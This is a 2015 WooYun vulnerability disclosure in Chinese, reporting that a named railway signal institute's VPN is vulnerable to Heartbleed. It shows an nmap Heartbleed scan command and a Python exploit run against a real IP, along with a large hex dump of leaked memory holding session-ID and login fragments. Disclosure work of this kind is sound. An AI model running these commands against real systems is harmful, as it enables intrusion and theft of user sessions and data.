当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123191

漏洞标题:某全路通信信号研究设计院系统补丁不及时心脏出血

相关厂商:cncert国家互联网应急中心

漏洞作者: Dolphin

提交时间:2015-07-03 12:02

修复时间:2015-08-21 10:08

公开时间:2015-08-21 10:08

漏洞类型:系统/服务补丁不及时

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-03: 细节已通知厂商并且等待厂商处理中
2015-07-07: 厂商已经确认,细节仅向厂商公开
2015-07-17: 细节向核心白帽子及相关领域专家公开
2015-07-27: 细节向普通白帽子公开
2015-08-06: 细节向实习白帽子公开
2015-08-21: 细节向公众公开

简要描述:

北京全路通信信号研究设计院有限公司VPN
存在心脏出血漏洞,泄漏部分敏感信息

详细说明:

nmap -n -p 443 -Pn --script=ssl-heartbleed 222.35.95.41

Starting Nmap 6.49BETA3 ( https://nmap.org ) at 2015-06-28 02:58 ?D1ú±ê×?ê±??
Nmap scan report for 222.35.95.41
Host is up (0.0040s latency).
PORT STATE SERVICE
443/tcp open https
| ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
| http://cvedetails.com/cve/2014-0160/
|_ http://www.openssl.org/news/secadv_20140407.txt
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds


22.png


漏洞证明:

11.png

python /root/openSSL.py 222.35.95.41
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 86
... received message: type = 22, ver = 0302, length = 1288
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 FF FF D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C ......SC[...r...
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
0100: 1E 92 AD 64 6F D4 0A 6C BD CE 39 BC 16 8F 44 6C ...do..l..9...Dl
0140: F9 A1 2A 14 03 01 00 01 01 16 03 01 00 30 9E 00 ..*..........0..
0180: 53 13 02 B4 43 21 2A 75 2D 61 8C 78 41 57 6E 00 S...C!*u-a.xAWn.
01c0: 30 2E 32 32 3A 39 30 30 30 0D 0A 49 66 2D 4D 6F 0.22:9000..If-Mo
0200: 4E 6F 6E 65 2D 4D 61 74 63 68 3A 20 22 30 61 37 None-Match: "0a7
0240: 65 3A 20 55 73 65 72 4C 6F 67 69 6E 4E 61 6D 65 e: UserLoginName
0280: 4C 6F 67 69 6E 54 79 70 65 3D 25 37 42 25 32 32 LoginType=%7B%22
02c0: 25 37 42 25 32 32 76 61 6C 75 65 25 32 32 25 33 %7B%22value%22%3
0300: 2E 4E 45 54 5F 53 65 73 73 69 6F 6E 49 64 3D 76 .NET_SessionId=v
0340: 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 65 coding: gzip, de
0380: 20 37 2E 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 7.0; Windows NT
03c0: 45 54 20 43 4C 52 20 33 2E 35 2E 33 30 37 32 39 ET CLR 3.5.30729
0400: 20 43 4C 52 20 31 2E 31 2E 34 33 32 32 3B 20 68 CLR 1.1.4322; h
0440: 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D onnection: Keep-
0480: 30 25 32 32 25 75 39 43 38 31 25 75 35 32 43 37 0%22%u9C81%u52C7
04c0: 52 4E 41 4D 45 25 32 32 25 37 44 3B 20 75 73 65 RNAME%22%7D; use
0500: 31 36 2E 31 30 30 2E 32 32 25 33 41 39 30 30 30 16.100.22%3A9000
0540: 6A 79 63 0D 0A 0D 0A 1F 56 53 C3 5D AA 48 06 4B jyc.....VS.].H.K
0580: 25 32 36 33 44 25 32 36 BD D2 6C 5A B1 39 62 36 %263D%26..lZ.9b6
05c0: DF 4B 63 AA DD BF 6D E0 50 18 00 40 3E 08 00 00 .Kc...m.P..@>...
0600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06c0: 4C 54 5F 6E 69 4B 67 45 30 5A 30 6F 4B 33 77 6E LT_niKgE0Z0oK3wn
0700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07c0: FF 07 00 00 54 40 62 00 08 00 00 00 00 00 62 00 ....T@b.......b.
0800: 00 00 00 00 00 00 00 01 C0 00 62 00 10 00 00 01 ..........b.....
0840: 00 00 00 00 FE FF FF FF D8 F9 DF 00 00 00 00 00 ................
0880: FE FF FF FF F4 F9 65 04 34 11 C1 77 00 10 00 00 ......e.4..w....
08c0: 08 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0900: 69 02 6D 71 00 00 62 00 00 00 00 00 01 00 00 00 i.mq..b.........
0940: 9E 6F C9 4B CE 9F 46 D6 8A 81 01 31 03 03 03 03 .o.K..F....1....
0980: 06 6C 0D 6F F7 F4 70 0D A0 84 38 A1 BB C0 55 C8 .l.o..p...8...U.
09c0: 67 09 2C 32 49 41 F5 59 95 76 62 7B D6 85 7B AD g.,2IA.Y.vb{..{.
0a00: 90 F0 C5 13 08 BB 94 5E E5 92 E7 57 F0 DC A7 4D .......^...W...M
0a40: 9F 07 57 95 E0 90 A6 95 9F E5 17 E2 AA FB 4F AA ..W...........O.
0a80: 20 B5 6D 41 C7 E7 F5 F0 9E FD 6E 78 69 3A CF 6C .mA......nxi:.l
0ac0: 9C 2D 08 35 60 39 0D 4E 9D 37 C1 6F FB E2 38 BC .-.5`9.N.7.o..8.
0b00: 86 4C AC AE 7A 5C D1 B2 EF 7B D6 D3 DD 31 81 C8 .L..z\...{...1..
0b40: D5 91 D9 4E 14 5F CB E1 67 36 6E 59 12 CF 19 80 ...N._..g6nY....
0b80: F8 4C BB 8A 16 E1 71 95 F8 31 6E 2B 5F C9 34 CA .L....q..1n+_.4.
0bc0: 19 4D 2F B3 B2 72 60 1C AA 9E 77 DA AD 10 BB 84 .M/..r`...w.....
0c00: 1B 65 A3 CC CB B4 81 4D 08 B5 55 A4 9D FF 7E A5 .e.....M..U...~.
0c40: 91 4B C2 4A 8F 88 93 51 D4 40 67 29 B4 96 BA CF .K.J...Q.@g)....
0c80: 00 01 95 45 00 03 3D 67 8A 40 00 40 06 8D 0C AC ...E..=g.@.@....
0cc0: 5D 1A EE EB 36 51 CD BF 3A 71 7E D0 77 63 11 F6 ]...6Q..:q~.wc..
0d00: 3A FF 38 86 F5 13 84 D9 27 85 6C AF 90 E0 30 CA :.8.....'.l...0.
0d40: 0D 37 E6 13 5F 31 02 A9 C4 6E 37 5F A4 6B 20 6F .7.._1...n7_.k o
0d80: DD D6 70 DB E3 72 E7 39 18 04 3F 9E 11 64 5A E7 ..p..r.9..?..dZ.
0dc0: 6B 61 9A C0 63 5A FD 5A 4C EC 74 56 E1 B2 4B 57 ka..cZ.ZL.tV..KW
0e00: 85 1B 79 FA 70 35 3D D6 A9 A0 C7 AA 7E D3 62 C9 ..y.p5=.....~.b.
0e40: 77 72 6C D1 15 86 E6 9E F0 C5 64 8A F2 49 AB 16 wrl.......d..I..
0e80: EF CC A4 12 BC 18 DD 83 6F 6B 58 9F 1E AF 99 8B ........okX.....
0ec0: 5B A3 80 D5 62 66 0A 0C FA 78 C6 D2 22 24 7D 57 [...bf...x.."$}W
0f00: 66 22 32 58 45 5C A2 DD E9 29 8E FC D1 6E 83 A1 f"2XE\...)...n..
0f40: EA 71 97 4D 9B 7D 37 8D E9 5B DA 84 C0 69 19 DD .q.M.}7..[...i..
0f80: 35 B9 5C 45 E8 07 45 41 E0 FE 1F 42 7D 50 0D A2 5.\E..EA...B}P..
0fc0: A7 A8 F0 13 51 5D 6B 05 0F 7C 51 76 07 02 6B B7 ....Q]k..|Qv..k.
1000: 32 30 36 25 32 35 75 36 37 39 30 25 32 37 2B 2B 206%25u6790%27++
1040: 74 74 61 63 68 49 44 25 33 44 25 32 37 36 34 30 ttachID%3D%27640
1080: 70 65 72 61 74 65 25 33 44 25 32 37 41 64 64 25 perate%3D%27Add%
10c0: 8C 23 68 A9 C3 50 FA 59 07 07 07 07 07 07 07 07 .#h..P.Y........
1100: 73 CD CE 01 C3 A3 1A 8F E9 96 E1 AE 8F 29 B9 00 s............)..
1140: 32 6C 75 5A 7A 30 69 4D 43 49 67 59 32 56 73 62 2luZz0iMCIgY2Vsb
1180: 42 50 48 52 6B 49 47 4E 73 59 58 4E 7A 50 53 4A BPHRkIGNsYXNzPSJ
11c0: 42 35 35 53 7A 36 4B 25 32 42 33 35 4C 71 36 4B B55Sz6K%2B35Lq6K
1200: 75 25 32 42 38 6A 4F 61 49 6C 75 65 62 75 4F 57 u%2B8jOaIluebuOW
1240: 34 6D 75 57 4B 6F 65 6D 69 68 75 57 76 76 4F 57 4muWKoemihuWvvOW
1280: 48 4A 47 62 33 4A 56 63 32 56 79 49 6A 34 38 64 HJGb3JVc2VyIj48d
12c0: 77 59 57 35 47 62 33 4A 56 63 32 56 79 49 69 42 wYW5Gb3JVc2VyIiB
1300: 25 32 42 6D 44 71 4F 6D 58 71 4F 57 75 6F 65 61 %2BmDqOmXqOWuoea
1340: 69 64 47 52 47 62 33 4A 54 64 47 46 30 64 58 4D idGRGb3JTdGF0dXM
1380: 38 4C 33 52 6B 50 6A 78 30 5A 43 42 6A 62 47 46 8L3RkPjx0ZCBjbGF
13c0: 68 64 47 55 69 49 48 52 70 64 47 78 6C 50 53 4C hdGUiIHRpdGxlPSL
1400: 68 62 6A 34 38 4C 33 52 6B 50 6A 77 76 64 48 49 hbj48L3RkPjwvdHI
1440: 7A 50 53 4A 30 5A 45 5A 76 63 6B 46 6B 64 6D 6C zPSJ0ZEZvckFkdml
1480: 00 00 01 2C 01 00 00 00 01 00 00 00 00 00 05 14 ...,............
14c0: 04 8A 49 D8 32 78 68 63 33 4D 39 49 6E 52 6B 52 ..I.2xhc3M9InRkR
1500: 69 49 25 32 42 50 48 4E 77 59 57 34 67 59 32 78 iI%2BPHNwYW4gY2x
1540: 25 32 42 50 43 39 30 59 57 4A 73 5A 54 34 38 4C %2BPC90YWJsZT48L
1580: 67 59 32 78 68 63 33 4D 39 49 6E 52 6B 52 6D 39 gY2xhc3M9InRkRm9
15c0: 39 49 6E 52 68 59 6D 78 6C 52 6D 39 79 56 48 4A 9InRhYmxlRm9yVHJ
1600: 39 49 6A 41 69 50 6A 78 30 63 69 42 6A 62 47 46 9IjAiPjx0ciBjbGF
1640: 47 56 4F 59 57 31 6C 49 69 42 6A 62 32 78 7A 63 GVOYW1lIiBjb2xzc
1680: 47 46 75 50 6A 77 76 64 47 51 25 32 42 50 43 39 GFuPjwvdGQ%2BPC9
16c0: 53 4A 30 5A 45 5A 76 63 6C 56 7A 5A 58 49 69 50 SJ0ZEZvclVzZXIiP
1700: 4F 53 36 70 4F 53 36 75 6A 72 6D 6E 61 6A 6B 75 OS6pOS6ujrmnajku
1740: 6B 75 71 54 76 76 4A 72 6E 6C 4B 6A 6E 71 36 44 kuqTvvJrnlKjnq6D
1780: 6D 69 4A 62 6C 68 61 7A 6C 6A 37 6A 6C 69 49 62 miJblhazlj7jliIb
17c0: 43 39 7A 63 47 46 75 50 6A 77 76 64 47 51 25 32 C9zcGFuPjwvdGQ%2
1800: 36 70 4F 53 36 75 6A 72 6D 6E 61 6A 6B 75 4C 33 6pOS6ujrmnajkuL3
1840: 71 54 76 76 4A 72 6E 6C 4B 6A 6E 71 36 44 6C 72 qTvvJrnlKjnq6Dlr
1880: 4A 62 6C 68 61 7A 6C 6A 37 6A 6C 69 49 62 6E 72 Jblhazlj7jliIbnr
18c0: 30 5A 44 34 38 64 47 51 67 59 32 78 68 63 33 4D 0ZD48dGQgY2xhc3M
1900: 58 52 6C 49 69 42 30 61 58 52 73 5A 54 30 69 35 XRlIiB0aXRsZT0i5
1940: 77 59 57 34 25 32 42 50 43 39 30 5A 44 34 38 4C wYW4%2BPC90ZD48L
1980: 78 59 43 48 67 64 57 61 58 4E 70 59 6D 78 6C 61 xYCHgdWaXNpYmxla
19c0: 00 40 06 8E 22 AC 10 7D 65 AC 10 64 16 C8 AD 23 .@.."..}e..d...#
1a00: 62 32 35 30 5A 57 35 30 49 69 42 6A 62 32 78 7A b250ZW50IiBjb2xz
1a40: 63 6B 46 6B 64 6D 6C 6A 5A 53 49 25 32 42 50 43 ckFkdmljZSI%2BPC
1a80: 62 47 55 69 50 6A 78 30 5A 43 42 6A 62 47 46 7A bGUiPjx0ZCBjbGFz
1ac0: 34 25 32 42 4E 69 30 78 35 4C 71 36 35 59 71 62 4%2BNi0x5Lq65Yqb
1b00: 4D 39 49 6E 52 79 52 6D 39 79 56 58 4E 6C 63 69 M9InRyRm9yVXNlci
1b40: 50 53 4A 7A 63 47 46 75 52 6D 39 79 56 58 4E 6C PSJzcGFuRm9yVXNl
1b80: 73 25 32 42 69 76 74 25 32 42 53 36 75 6C 30 69 s%2Bivt%2BS6ul0i
1bc0: 52 6B 50 6A 78 30 5A 43 42 6A 62 47 46 7A 63 7A RkPjx0ZCBjbGFzcz
1c00: 32 7A 37 37 79 49 35 4C 71 36 35 59 71 62 37 37 2z77yI5Lq65Yqb77
1c40: 34 38 63 33 42 68 62 69 42 6A 62 47 46 7A 63 7A 48c3BhbiBjbGFzcz
1c80: 49 77 4D 54 55 74 4E 69 30 79 4D 69 41 78 4D 6A IwMTUtNi0yMiAxMj
1cc0: 63 6B 5A 76 63 6D 46 6B 64 6D 6C 6A 5A 53 49 25 ckZvcmFkdmljZSI%
1d00: 62 6D 68 49 25 32 46 6F 70 34 45 36 50 43 39 30 bmhI%2Fop4E6PC90
1d40: 63 33 42 68 62 6A 30 69 4D 69 49 67 64 47 6C 30 c3Bhbj0iMiIgdGl0
1d80: 77 76 63 33 42 68 62 6A 34 38 4C 33 52 6B 50 6A wvc3Bhbj48L3RkPj
1dc0: 63 33 4D 39 49 6E 52 6B 52 6D 39 79 54 6D 39 6B c3M9InRkRm9yTm9k
1e00: 69 71 48 70 67 36 67 38 4C 33 4E 77 59 57 34 25 iqHpg6g8L3NwYW4%
1e40: 51 67 59 32 78 68 63 33 4D 39 49 6E 52 6B 52 6D QgY2xhc3M9InRkRm
1e80: 61 58 52 73 5A 54 30 69 35 6F 25 32 42 51 35 4C aXRsZT0i5o%2BQ5L
1ec0: 35 62 47 41 50 43 39 7A 63 47 46 75 50 00 00 00 5bGAPC9zcGFuP...
1f00: 00 80 10 03 FB C0 29 00 00 01 01 08 0A 08 EB 6B ......)........k
1f40: 6C 30 62 47 55 39 49 75 57 4B 6E 75 65 51 68 75 l0bGU9IuWKnueQhu
1f80: 5A 45 5A 76 63 6B 52 68 64 47 55 69 50 6A 78 7A ZEZvckRhdGUiPjxz
1fc0: 68 75 61 58 74 75 6D 58 74 43 49 25 32 42 4D 6A huaXtumXtCI%2BMj
2000: 63 69 42 6A 62 47 46 7A 63 7A 30 69 64 48 4A 47 ciBjbGFzcz0idHJG
2040: 5A 53 49 25 32 42 35 59 71 65 35 35 43 47 35 6F ZSI%2B5Yqe55CG5o
2080: 62 6E 52 6C 62 6E 51 69 49 47 4E 76 62 48 4E 77 bnRlbnQiIGNvbHNw
20c0: 51 57 52 32 61 57 4E 6C 49 6A 34 38 4C 33 4E 77 QWR2aWNlIj48L3Nw
2100: 63 69 42 6A 62 47 46 7A 63 7A 30 69 64 48 4A 47 ciBjbGFzcz0idHJG
2140: 30 69 64 47 52 47 62 33 4A 55 63 6D 46 6A 5A 53 0idGRGb3JUcmFjZS
2180: 59 32 56 73 62 48 4E 77 59 57 4E 70 62 6D 63 39 Y2VsbHNwYWNpbmc9
21c0: 56 47 6C 30 62 47 55 69 50 6A 78 30 5A 43 42 6A VGl0bGUiPjx0ZCBj
2200: 4E 77 59 57 34 25 32 42 4E 69 30 79 35 4C 71 36 NwYW4%2BNi0y5Lq6
2240: 63 6A 34 38 64 48 49 67 59 32 78 68 63 33 4D 39 cj48dHIgY2xhc3M9
2280: 78 7A 63 47 46 75 49 47 4E 73 59 58 4E 7A 50 53 xzcGFuIGNsYXNzPS
22c0: 50 76 76 49 6A 6B 75 72 72 6C 69 70 76 76 76 49 PvvIjkurrlipvvvI
2300: 50 6A 77 76 64 47 51 25 32 42 50 48 52 6B 49 47 PjwvdGQ%2BPHRkIG
2340: 72 6C 70 35 7A 6D 70 61 41 69 50 75 57 75 6A 4F rlp5zmpaAiPuWujO
2380: 49 47 4E 73 59 58 4E 7A 50 53 4A 7A 63 47 46 75 IGNsYXNzPSJzcGFu
23c0: 30 32 4C 54 49 7A 49 44 67 36 4D 44 49 36 4E 54 02LTIzIDg6MDI6NT
2400: 00 01 00 00 00 00 00 05 14 45 00 05 14 6E 27 40 .........E...n'@
2440: 64 48 4A 47 62 33 4A 68 5A 48 5A 70 59 32 55 69 dHJGb3JhZHZpY2Ui
2480: 43 47 35 6F 53 50 36 4B 65 42 4F 6A 77 76 64 47 CG5oSP6KeBOjwvdG
24c0: 62 48 4E 77 59 57 34 39 49 6A 49 69 49 48 52 70 bHNwYW49IjIiIHRp
2500: 4C 33 4E 77 59 57 34 25 32 42 50 43 39 30 5A 44 L3NwYW4%2BPC90ZD
2540: 64 48 4A 47 62 33 4A 55 63 6D 46 6A 5A 53 49 25 dHJGb3JUcmFjZSI%
2580: 46 6A 5A 53 49 25 32 42 50 48 52 68 59 6D 78 6C FjZSI%2BPHRhYmxl
25c0: 62 6D 63 39 49 6A 41 69 49 47 4E 6C 62 47 78 77 bmc9IjAiIGNlbGxw
2600: 5A 43 42 6A 62 47 46 7A 63 7A 30 69 64 47 52 47 ZCBjbGFzcz0idGRG
2640: 73 25 32 42 69 76 74 25 32 42 53 36 75 6A 77 76 s%2Bivt%2BS6ujwv
2680: 49 69 50 6A 78 30 5A 43 42 6A 62 47 46 7A 63 7A IiPjx0ZCBjbGFzcz
26c0: 49 69 49 48 52 70 64 47 78 6C 50 53 4C 6D 6A 35 IiIHRpdGxlPSLmj5
2700: 7A 6D 6A 4B 25 32 46 6E 6B 49 4D 38 4C 33 4E 77 zmjK%2FnkIM8L3Nw
2740: 52 73 5A 54 30 69 35 59 71 65 35 35 43 47 35 4C RsZT0i5Yqe55CG5L
2780: 4D 39 49 6E 52 6B 52 6D 39 79 52 47 46 30 5A 53 M9InRkRm9yRGF0ZS
27c0: 35 59 71 65 35 35 43 47 35 70 65 32 36 5A 65 30 5Yqe55CG5pe26Ze0
2800: 52 79 50 6A 78 30 63 69 42 6A 62 47 46 7A 63 7A RyPjx0ciBjbGFzcz
2840: 56 55 61 58 52 73 5A 53 49 25 32 42 35 59 71 65 VUaXRsZSI%2B5Yqe
2880: 6C 6A 5A 55 4E 76 62 6E 52 6C 62 6E 51 69 49 47 ljZUNvbnRlbnQiIG
28c0: 46 75 52 6D 39 79 51 57 52 32 61 57 4E 6C 49 6A FuRm9yQWR2aWNlIj
2900: 52 79 50 6A 78 30 63 69 42 6A 62 47 46 7A 63 7A RyPjx0ciBjbGFzcz
2940: 31 22 20 42 6F 72 64 65 72 52 69 67 68 74 53 74 1" BorderRightSt
2980: 20 56 61 6C 75 65 3D 22 2D 31 22 3E 3C 4C 61 62 Value="-1"><Lab
29c0: 6F 6E 74 4E 61 6D 65 3D 22 E5 AE 8B E4 BD 93 22 ontName="......"
2a00: 6C 79 43 6F 6E 64 69 74 69 6F 6E 3D 22 22 20 43 lyCondition="" C
2a40: 20 20 20 64 62 6F 2E 46 6E 5F 47 65 74 73 70 6C dbo.Fn_Getspl
2a80: 4C 45 43 54 20 20 20 20 20 64 62 6F 2E 46 6E 5F LECT dbo.Fn_
2ac0: 69 74 27 29 20 41 53 20 45 78 70 72 31 29 20 41 it') AS Expr1) A
2b00: 22 20 44 61 74 61 46 69 65 6C 64 3D 22 22 20 43 " DataField="" C
2b40: 69 6F 6E 3D 22 22 20 4C 6F 63 6B 50 6F 73 3D 22 ion="" LockPos="
2b80: 6E 65 53 70 61 63 65 3D 22 30 22 20 4C 65 66 74 neSpace="0" Left
2bc0: 69 67 68 74 3D 22 31 22 20 56 69 73 69 62 6C 65 ight="1" Visible
2c00: 30 33 22 20 43 65 6C 6C 52 61 6E 67 65 3D 22 32 03" CellRange="2
2c40: 22 31 30 22 20 42 6F 72 64 65 72 54 6F 70 57 69 "10" BorderTopWi
2c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
2f00: 01 00 00 00 00 00 05 78 45 00 05 78 6B A0 40 00 .......xE..xk.@.


修复方案:

更新升级,你懂得。

版权声明:转载请注明来源 Dolphin@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-07 10:06

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论